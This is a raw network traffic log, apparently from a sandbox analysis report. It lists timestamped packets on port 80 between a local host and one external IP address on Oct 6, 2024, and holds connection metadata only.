                                                                                                                                                Oct 6, 2024 22:18:47.176790953 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.176798105 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.176810026 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.176856995 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.176912069 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.176920891 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.176932096 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.176960945 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.176974058 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.177073956 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.177082062 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.177087069 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.177093029 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.177123070 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.177182913 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.177191973 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.177226067 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.177233934 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.177233934 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.177263975 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.177313089 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.177319050 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.177329063 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.177335024 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.177360058 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.177373886 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.177438021 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.177510977 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.177524090 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.177529097 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.177534103 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.177544117 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.177556992 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.177584887 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.177750111 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.177761078 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.177772045 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.177778006 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.177783966 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.177803993 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.177819014 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.177846909 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.177917957 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.177970886 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.177983046 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.178014994 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.178097963 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.178107023 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.178119898 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.178123951 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.178128958 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.178142071 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.178149939 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.178169966 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.178294897 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.178307056 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.178349018 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.178401947 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.178411007 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.178421021 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.178426981 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.178431988 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.178442001 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.178451061 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.178574085 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.178625107 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.178638935 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.178647995 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.178663969 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.178680897 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.178767920 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.178776979 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.178786993 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.178792000 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.178817987 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.178841114 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.178925991 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.178934097 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.178945065 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.178950071 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.178983927 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.179004908 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.179055929 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.179061890 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.179074049 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.179101944 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.179126978 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.179193020 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.179203987 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.179214954 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.179219961 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.179224014 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.179234028 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.179239035 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.179245949 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.179250002 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.179280996 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.179294109 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.179440022 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.179523945 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.179534912 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.179539919 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.179544926 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.179550886 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.179568052 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.179600000 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.261132956 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.261181116 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.261187077 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.261193991 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.261265993 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.261297941 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.261305094 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.261320114 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.261344910 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.261446953 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.261457920 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.261465073 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.261471033 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.261477947 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.261485100 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.261492014 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.261519909 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.261568069 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.261571884 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.261574030 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.261576891 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.261616945 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.261857986 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.261866093 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.261876106 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.261881113 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.261914015 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.261919022 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.261923075 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.261926889 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.261934996 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.261940002 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.261981010 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.261981010 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.262087107 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.262092113 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.262104034 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.262109041 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.262142897 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.262197971 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.262204885 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.262209892 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.262213945 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.262248993 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.262279987 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.262902975 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.262916088 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.262921095 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.262929916 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.262970924 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.262995958 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.263056993 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.263067961 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.263077974 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.263083935 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.263088942 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.263092995 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.263103962 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.263132095 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.263147116 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.263194084 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.263225079 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.263235092 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.263237000 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.263269901 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.263349056 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.263356924 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.263362885 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.263396025 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.263406038 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.263530016 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.263535976 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.263541937 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.263546944 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.263550997 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.263572931 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.263597965 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.263606071 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.263612986 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.263622999 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.263655901 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.263715029 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.263724089 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.263729095 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.263747931 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.263773918 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.263861895 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.263868093 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.263878107 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.263883114 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.263894081 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.263899088 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.263922930 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.263922930 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.263938904 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.264113903 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.264122009 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.264132023 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.264134884 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.264143944 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.264157057 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.264163017 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.264179945 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.264195919 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.264266968 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.264273882 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.264283895 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.264288902 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.264301062 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.264308929 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.264342070 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.264472961 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.264480114 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.264496088 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.264503002 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.264508009 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.264514923 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.264554024 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.264554024 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.264611006 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.264617920 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.264658928 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.264750004 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.264759064 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.264787912 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.264873028 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.264883041 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.264894009 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.264899969 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.264904022 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.264925957 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.264949083 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.264956951 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.265019894 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.265050888 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.265059948 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.265072107 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.265077114 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.265085936 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.265091896 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.265100002 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.265131950 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.265197039 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.265239000 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.265347958 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.265392065 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.265450001 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.265461922 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.265489101 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.265539885 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.265547037 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.265558004 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.265563965 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.265600920 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.265619040 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.265641928 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.265646935 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.265657902 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.265662909 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.265691042 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.265713930 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.265718937 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.265790939 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.265803099 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.265835047 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.265867949 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.265876055 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.265916109 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.265933990 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.265939951 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.265953064 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.265981913 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.266016960 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.266025066 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.266066074 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.266098976 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.266108990 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.266153097 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.348239899 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.348265886 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.348283052 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.348293066 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.348294973 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.348301888 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.348308086 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.348315001 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.348350048 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.348387957 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.348393917 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.348397970 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.348397970 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.348408937 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.348421097 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.348426104 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.348426104 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.348465919 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.348567009 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.348614931 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.348732948 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.348741055 CEST806388545.145.4.234192.168.2.6
